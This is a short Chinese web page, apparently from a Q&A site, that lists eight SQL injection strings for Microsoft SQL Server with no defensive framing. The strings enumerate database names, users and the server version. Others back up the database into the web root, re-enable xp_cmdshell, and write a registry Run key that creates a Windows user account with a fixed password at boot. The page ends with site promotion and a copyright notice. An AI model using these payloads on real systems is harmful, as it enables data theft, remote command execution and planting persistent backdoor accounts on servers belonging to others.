sql注入语句有:
1、返回的是连接的数据库名:
and db_name()>0
2、获取连接用户名:
and user>0
3、将数据库备份到Web目录下面:
;backup database 数据库名 to disk=’c:\inetpub\wwwroot\1.db’;–
4、显示SQL系统版本:
and 1=(select @@VERSION) 或and 1=convert(int,@@version)–
5、判断xp_cmdshell扩展存储过程是否存在:
and 1=(SELECT count(*) FROM master.dbo.sysobjects WHERE xtype = ‘X’ AND name =’xp_cmdshell’)
6、恢复xp_cmdshell扩展存储的命令:
;exec master.dbo.sp_addextendedproc ‘xp_cmdshell’,’e:\inetput\web\xplog70.dll’;–
7、向启动组中写入命令行和执行程序:
;EXEC master.dbo.xp_regwrite ‘HKEY_LOCAL_MACHINE’,’SOFTWARE\Microsoft\Windows\CurrentVersion\
Run’,’help1′,’REG_SZ’,’cmd.exe /c net user test ptlove /add’
8、查看当前的数据库名称:
and 0 db_name(n) n改成0,1,2,3……就可以跨库了 或and 1=convert(int,db_name())–
了解更多sql注入语句有哪些相关的解答,就上多想派(www.duoxiangpai.com)。
本文章由用户业百科分享,版权归原作者,如侵犯,请联系(点这里联系),经核实,我们将第一时间删除。如若转载,请注明出处:https://www.duoxiangpai.com/64127.html